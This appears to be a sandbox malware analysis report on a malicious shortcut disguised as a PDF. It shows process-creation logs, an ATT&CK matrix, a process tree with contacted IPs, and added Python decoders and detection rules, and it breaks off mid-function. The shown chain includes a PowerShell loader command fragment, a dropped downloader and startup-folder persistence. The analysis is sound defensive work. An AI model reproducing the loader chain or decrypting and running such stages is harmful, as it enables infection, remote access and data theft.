        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe "C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe"
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C tar -xf "C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64.zip" -C "C:\Users\user\AppData\Roaming"
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tar.exe tar -xf "C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64.zip" -C "C:\Users\user\AppData\Roaming"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php
        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php
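The mshta-spawned PowerShell command line recorded above carries its next stage inline: the $ddg string is the AES ciphertext as hex in its first 2464 characters followed by the AES key as hex, the IV is 16 zero bytes (New-Object byte[] 16), and .NET's Aes.Create() defaults to CBC mode with PKCS7 padding. The hex-to-bytes trick is the -split / -replace '..' idiom. The Python below re-implements that routine so the payload can be decrypted offline without running the stage. It is an added example, not code from the report or from the malware, and it assumes the cryptography package is installed; the blob it builds when run without arguments is constructed test data, not the real payload, and the key size is whatever the hex remainder yields (validated to 16, 24 or 32 bytes).

```python
from __future__ import annotations

import re
import sys

ZERO_IV = bytes(16)  # mirrors: $zXe.IV = New-Object byte[] 16


def ps_hex_to_bytes(hexstr: str) -> bytes:
    """Equivalent of: -split ($s -replace '..', '0x$& ')
    i.e. the string is consumed two hex digits at a time. PowerShell would
    silently mangle an odd trailing nibble; here it is an error."""
    if len(hexstr) % 2 or not re.fullmatch(r"[0-9A-Fa-f]*", hexstr):
        raise ValueError("not an even-length hex string")
    return bytes.fromhex(hexstr)


def split_stage_blob(blob: str, ct_hex_len: int) -> tuple[bytes, bytes]:
    """Split the blob the way the stage does: $ddg.SubString(0, N) is the
    ciphertext, $ddg.SubString(N) is the key."""
    ct = ps_hex_to_bytes(blob[:ct_hex_len])
    key = ps_hex_to_bytes(blob[ct_hex_len:])
    if len(key) not in (16, 24, 32):
        raise ValueError(f"AES key must be 16/24/32 bytes, got {len(key)}")
    if not ct or len(ct) % 16:
        raise ValueError(f"ciphertext length {len(ct)} is not a multiple of 16")
    return ct, key


def decrypt_stage(blob: str, ct_hex_len: int = 2464) -> bytes:
    """AES-CBC with a zero IV and PKCS7 unpadding, the Aes.Create() defaults."""
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    ct, key = split_stage_blob(blob, ct_hex_len)
    dec = Cipher(algorithms.AES(key), modes.CBC(ZERO_IV)).decryptor()
    padded = dec.update(ct) + dec.finalize()
    unpad = padding.PKCS7(128).unpadder()
    return unpad.update(padded) + unpad.finalize()


def build_sample_blob(plaintext: bytes, key: bytes) -> tuple[str, int]:
    """Constructed test data only (not the real payload): encrypt under the
    same scheme and return (blob, ct_hex_len) so decrypt_stage() can be
    exercised offline."""
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    pad = padding.PKCS7(128).padder()
    padded = pad.update(plaintext) + pad.finalize()
    enc = Cipher(algorithms.AES(key), modes.CBC(ZERO_IV)).encryptor()
    ct = enc.update(padded) + enc.finalize()
    return ct.hex().upper() + key.hex().upper(), len(ct) * 2


if __name__ == "__main__":
    # Usage: python decode_stage.py <contents of $ddg> [ciphertext hex length]
    if len(sys.argv) > 1:
        n = int(sys.argv[2]) if len(sys.argv) > 2 else 2464
        sys.stdout.buffer.write(decrypt_stage(sys.argv[1], n))
    else:
        sample, n = build_sample_blob(b"Write-Host 'next stage'", b"K" * 32)
        print(decrypt_stage(sample, n).decode())
```

Pass the real $ddg value as the first argument to obtain the next stage; the bytes are written unchanged because the stage itself feeds them to [System.String]::new(), which maps each byte to one character, and any decoding decision is better made after inspection.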
Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe | Code function: 12_2_00007FF658E413D0 cpuid 12_2_00007FF658E413D0
Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe | Code function: EnumSystemLocalesW,12_2_00007FF658E45B0C
Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe | Code function: EnumSystemLocalesW,12_2_00007FF658E3C2AC
Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe | Code function: EnumSystemLocalesW,12_2_00007FF658E45A3C
Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_00007FF658E45BA4
Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe | Code function: GetLocaleInfoW,12_2_00007FF658E45DF0
Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe | Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,12_2_00007FF658E456F0
Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe | Code function: GetLocaleInfoW,12_2_00007FF658E45FF8
Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_00007FF658E45F48
Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe | Code function: try_get_function,GetLocaleInfoW,12_2_00007FF658E3C750
Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe | Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_00007FF658E46124
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tar.exe | Queries volume information: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64.zip VolumeInformation
Source: C:\Windows\System32\tar.exe | Queries volume information: C:\Users VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe | Queries volume information: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php VolumeInformation
Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe | Queries volume information: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe | Queries volume information: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php VolumeInformation
Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe | Queries volume information: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\config.json VolumeInformation
Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe | Queries volume information: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\config.json VolumeInformation
Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe | Code function: 12_2_00007FF658E2E1F8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,12_2_00007FF658E2E1F8
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
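The mshta.exe to powershell.exe command line listed above decrypts its next stage in memory: the hex string assigned to $ddg is split at offset 2464, the first part is the AES ciphertext, the remainder is the key, and the IV is sixteen zero bytes (new-object byte[] 16). Because Aes.Create() in .NET defaults to CBC mode with PKCS7 padding, the stage can be recovered offline without running the script. The decoder below is an added example written for this report, not code from the sample or from Joe Sandbox. It assumes those .NET defaults, uses only the Python standard library (a compact AES is included so no extra package is needed), and exercises itself on a constructed blob, because the real blob is elided on this page.

```python
import re

# Minimal AES (FIPS-197) on the standard library only; encryption is here just to
# build the constructed sample and to check the code against a known answer.
def xtime(a):
    return ((a << 1) ^ 0x1B) & 0xFF if a & 0x80 else a << 1

def gmul(a, b):                                  # multiplication in GF(2^8)
    r = 0
    while b:
        r, a, b = r ^ (a if b & 1 else 0), xtime(a), b >> 1
    return r

def gen_sbox():                                  # derive the S-box instead of pasting it
    sbox, p, q = [0] * 256, 1, 1
    rot = lambda x, s: ((x << s) | (x >> (8 - s))) & 0xFF
    while True:
        p = (p ^ (p << 1) ^ (0x1B if p & 0x80 else 0)) & 0xFF   # p *= 3
        q ^= (q << 1) & 0xFF; q ^= (q << 2) & 0xFF; q ^= (q << 4) & 0xFF
        q ^= 0x09 if q & 0x80 else 0                            # q /= 3, so q == 1/p
        sbox[p] = q ^ rot(q, 1) ^ rot(q, 2) ^ rot(q, 3) ^ rot(q, 4) ^ 0x63
        if p == 1:
            break
    sbox[0] = 0x63
    return sbox

SBOX = gen_sbox()
INV_SBOX = [SBOX.index(v) for v in range(256)]

def expand_key(key):                             # 16/24/32-byte key -> list of round keys
    nk, nr = len(key) // 4, len(key) // 4 + 6
    w, rcon = [list(key[i:i + 4]) for i in range(0, len(key), 4)], 1
    for i in range(nk, 4 * (nr + 1)):
        t = list(w[i - 1])
        if i % nk == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]
            t[0], rcon = t[0] ^ rcon, xtime(rcon)
        elif nk > 6 and i % nk == 4:
            t = [SBOX[b] for b in t]
        w.append([a ^ b for a, b in zip(w[i - nk], t)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(nr + 1)]

def shift_rows(s, inv=False):                    # state is column-major: s[4*col + row]
    d = -1 if inv else 1
    return [s[4 * ((c + d * r) % 4) + r] for c in range(4) for r in range(4)]

def mix_columns(s, inv=False):
    m = (14, 11, 13, 9) if inv else (2, 3, 1, 1)
    return [gmul(m[0], s[4 * c + r]) ^ gmul(m[1], s[4 * c + (r + 1) % 4])
            ^ gmul(m[2], s[4 * c + (r + 2) % 4]) ^ gmul(m[3], s[4 * c + (r + 3) % 4])
            for c in range(4) for r in range(4)]

def encrypt_block(rk, block):
    s = [b ^ k for b, k in zip(block, rk[0])]
    for rnd in range(1, len(rk)):
        s = shift_rows([SBOX[b] for b in s])
        s = mix_columns(s) if rnd < len(rk) - 1 else s
        s = [b ^ k for b, k in zip(s, rk[rnd])]
    return bytes(s)

def decrypt_block(rk, block):
    s = [b ^ k for b, k in zip(block, rk[-1])]
    for rnd in range(len(rk) - 2, -1, -1):
        s = [INV_SBOX[b] for b in shift_rows(s, inv=True)]
        s = [b ^ k for b, k in zip(s, rk[rnd])]
        s = mix_columns(s, inv=True) if rnd else s
    return bytes(s)

def cbc(key, iv, data, decrypt):                 # data must be a whole number of blocks
    rk, prev, out = expand_key(key), iv, b""
    for i in range(0, len(data), 16):
        blk = data[i:i + 16]
        if decrypt:
            cur, prev = bytes(a ^ b for a, b in zip(decrypt_block(rk, blk), prev)), blk
        else:
            cur = prev = encrypt_block(rk, bytes(a ^ b for a, b in zip(blk, prev)))
        out += cur
    return out

def pkcs7_unpad(data):                           # .NET Aes.Create() pads with PKCS7
    n = data[-1] if data else 0
    if 1 <= n <= 16 and data.endswith(bytes([n]) * n):
        return data[:-n], True
    return data, False                           # wrong key or damaged blob: keep raw bytes

# Loader-specific part: '<hex>' followed by .substring(0, N) gives blob and split offset.
STAGE_RE = re.compile(r"\$\w+\s*=\s*'([0-9a-fA-F]+)'.*?\.substring\(0,\s*(\d+)\)", re.S)

def parse_stage_cmdline(cmdline):                # -> (hex blob, split offset)
    m = STAGE_RE.search(cmdline)
    if not m:
        raise ValueError("no hex blob followed by .substring(0, N) found")
    return m.group(1), int(m.group(2))

def decode_blob(hexblob, split):                 # hex[:split] = ciphertext, hex[split:] = key
    ct, key = bytes.fromhex(hexblob[:split]), bytes.fromhex(hexblob[split:])
    if len(key) not in (16, 24, 32) or len(ct) % 16:
        raise ValueError("ciphertext/key lengths do not fit AES-CBC")
    return pkcs7_unpad(cbc(key, bytes(16), ct, decrypt=True))   # IV: new-object byte[] 16

# Constructed sample (the report elides the real blob): a harmless stage wrapped the
# way the loader expects, so the decoder can be exercised offline.
SAMPLE_KEY, SAMPLE_STAGE = bytes(range(16)), b"Write-Output 'constructed next stage'"
PAD = 16 - len(SAMPLE_STAGE) % 16
SAMPLE_BLOB = cbc(SAMPLE_KEY, bytes(16), SAMPLE_STAGE + bytes([PAD]) * PAD, False).hex() + SAMPLE_KEY.hex()
SAMPLE_CMDLINE = ("powershell.exe -w 1 -ep unrestricted -nop $ddg = '%s';"
                  "function wlh ($iuudd){return -split ($iuudd -replace '..', '0x$& ')};"
                  "$feifxp = wlh($ddg.substring(0, %d));" % (SAMPLE_BLOB, len(SAMPLE_BLOB) - 32))
```

Feed the full command line, taken from a report row or from a process-creation event, to parse_stage_cmdline and pass the result to decode_blob. A False padding flag almost always means the split offset or the key was wrong, so the raw bytes are returned for triage rather than discarded. On this page the real blob is replaced by a placeholder, so only the constructed sample can be run here.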

Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: mshta.exe PID: 7872, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\samm[1], type: DROPPED

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: mshta.exe PID: 7872, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\samm[1], type: DROPPED
Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe | Code function: 24_2_00007FF7498C60A0 php_network_getaddresses,free,soc ket,closesocket,__zend_malloc,htons,__zend_malloc,htons,setsockopt,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,free,php_network_freeaddresses,closesocket,php_socket_error_str,getsockname,htons,24_2_00007FF7498C60A0
ATT&CK matrix (one line per tactic, techniques as rendered by the report; the digits in front of a technique are the report's own counters, kept as shown):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: 211 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 21 Windows Management Instrumentation; 2 Command and Scripting Interpreter; 2 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 211 Scripting; 2 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 11 Process Injection; 2 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 121 Masquerading; 31 Virtualization/Sandbox Evasion; 11 Process Injection; 11 Obfuscated Files or Information; 1 Timestomp; 1 DLL Side-Loading; Compile After Delivery
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 1 System Time Discovery; 131 Security Software Discovery; 11 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 3 File and Directory Discovery; 45 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Email Collection; 1 Archive Collected Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 1 Encrypted Channel; 1 Ingress Tool Transfer; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph ID: 1584384 | Sample: HateSpeech2024_Summary.pdf.lnk.bin.lnk | Start date: 05/01/2025 | Architecture: WINDOWS | Score: 100
Sample-level signatures: Malicious sample detected (through community Yara rule); Windows shortcut file (LNK) starts blacklisted processes; Multi AV Scanner detection for submitted file; 12 other signatures

Process tree (graph node numbers in brackets, counters after a process name as shown in the graph; "contacts" is a network destination, "drops" a written file, signatures in parentheses):

[2] sample start
  [12] WMIC.exe 1  (Contains functionality to create processes via WMI; Creates processes via WMI)
    [20] powershell.exe 7  (Windows shortcut file (LNK) starts blacklisted processes; Powershell drops PE file)
      [27] powershell.exe 7  (Windows shortcut file (LNK) starts blacklisted processes)
        [36] mshta.exe 17  contacts 104.21.2.79 CLOUDFLARENETUS United States; drops C:\Users\user\AppData\Local\...\samm[1], PE32  (Windows shortcut file (LNK) starts blacklisted processes; Suspicious powershell command line found)
          [41] powershell.exe 17 18  drops php_bot_downloader...AVERAGE-BOI-CLN.exe, PE32+
            [44] php_bot_downloader_v2-AVERAGE-BOI-CLN.exe  contacts 213.139.205.247 SERVERHOSH-AS-APServerhoshInternetServiceNL Netherlands  (Windows shortcut file (LNK) starts blacklisted processes)
              [52] cmd.exe
                [58] tar.exe  drops C:\Users\user\AppData\Roaming\...\php.exe, PE32+; C:\Users\user\AppData\...\vcruntime140.dll, PE32+; C:\Users\user\AppData\Roaming\...\phpdbg.exe, PE32+; 63 other files (none is malicious)  (Found PHP interpreter)
                [62] conhost.exe
              [54] cmd.exe
                [64] php.exe  drops C:\Users\user\AppData\Roaming\...\PHP-8.2.vbs, ASCII  (Drops VBS files to the startup folder)
                [66] conhost.exe
            [48] Acrobat.exe 83
              [56] AcroCEF.exe 106
                [68] AcroCEF.exe
            [50] conhost.exe
      [30] conhost.exe
    [23] conhost.exe 1
  [15] wscript.exe  (Windows shortcut file (LNK) starts blacklisted processes; Windows Scripting host queries suspicious COM object (likely to drop second stage))
    [25] cmd.exe
      [32] php.exe  (Found PHP interpreter)
      [34] conhost.exe
  [17] svchost.exe 1 1  contacts 127.0.0.1 unknown unknown
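Read chain by chain, the graph above is WMIC to PowerShell to PowerShell to mshta to PowerShell to the PE dropper to cmd to tar and php, plus the wscript to cmd to php.exe branch that the startup-folder VBS gives the sample on the next logon. Each link corresponds to one of the Sigma titles at the top of the report. What follows is an added detection example, not something the report or Joe Sandbox provides: it encodes those parent/child relationships as rules and runs them over constructed Sysmon-style process-creation records that mirror the graph. The node numbers stand in for PIDs, the images follow the report, and any argument the report does not show is marked "...".

```python
import re
from collections import namedtuple

# Constructed Sysmon/4688-style process-creation records that mirror the chain in
# the behavior graph above. PIDs are the graph's node numbers, not real PIDs;
# images follow the report, and argument strings shown as "..." are made up.
Event = namedtuple("Event", "pid ppid image cmdline")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
PHP_DIR = r"C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64"
EVENTS = [
    Event(2, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    Event(12, 2, r"C:\Windows\System32\wbem\WMIC.exe", "WMIC.exe process call create ..."),
    Event(20, 12, PS, "powershell.exe -w 1 -ep unrestricted -nop ..."),
    Event(27, 20, PS, "powershell.exe -w 1 -ep unrestricted -nop ..."),
    Event(36, 27, r"C:\Windows\System32\mshta.exe", "mshta.exe ..."),
    Event(41, 36, PS, "powershell.exe -w 1 -ep unrestricted -nop $ddg = '...'"),
    Event(44, 41, r"C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe",
          "php_bot_downloader_v2-AVERAGE-BOI-CLN.exe"),
    Event(52, 44, CMD, "cmd.exe /c tar ..."),
    Event(58, 52, r"C:\Windows\System32\tar.exe", "tar.exe ..."),
    Event(54, 44, CMD, "cmd.exe /c " + PHP_DIR + r"\php.exe " + PHP_DIR + r"\php-win.php"),
    Event(64, 54, PHP_DIR + r"\php.exe", PHP_DIR + r"\php.exe " + PHP_DIR + r"\php-win.php"),
    Event(15, 2, r"C:\Windows\System32\wscript.exe", "wscript.exe PHP-8.2.vbs"),
    Event(25, 15, CMD, '"' + CMD + '" /c ' + PHP_DIR + r"\php.exe " + PHP_DIR + r"\php-win.php"),
    Event(32, 25, PHP_DIR + r"\php.exe", PHP_DIR + r"\php.exe " + PHP_DIR + r"\php-win.php"),
]

INTERPRETERS = {"php.exe", "python.exe", "node.exe", "autoit3.exe", "pwsh.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
WEAK_POLICY = re.compile(r"-(?:ep|executionpolicy)\s+(?:unrestricted|bypass)\b", re.I)
NO_PROFILE = re.compile(r"-nop(?:rofile)?\b", re.I)

def base(path):
    return path.rsplit("\\", 1)[-1].lower()

def in_user_dir(path):
    return "\\appdata\\" in path.lower()

def lineage(by_pid, pid):
    """Events from pid upward, child first; stops at an unknown parent or a loop."""
    chain = []
    while pid in by_pid and by_pid[pid] not in chain:
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain

def detect(events):
    """Return sorted (rule, pid) pairs; each rule is one link of the chain above."""
    by_pid, hits = {e.pid: e for e in events}, set()
    for e in events:
        chain = lineage(by_pid, e.pid)
        me = base(e.image)
        parent = base(chain[1].image) if len(chain) > 1 else ""
        if me == "powershell.exe" and parent in ("mshta.exe", "wmic.exe"):
            hits.add(("powershell spawned by " + parent, e.pid))
        if me == "powershell.exe" and WEAK_POLICY.search(e.cmdline) and NO_PROFILE.search(e.cmdline):
            hits.add(("powershell lowers execution policy and skips profile", e.pid))
        if me in INTERPRETERS and in_user_dir(e.image):
            hits.add(("scripting interpreter running from AppData", e.pid))
        if in_user_dir(e.image) and any(base(a.image) in SCRIPT_HOSTS for a in chain[1:]):
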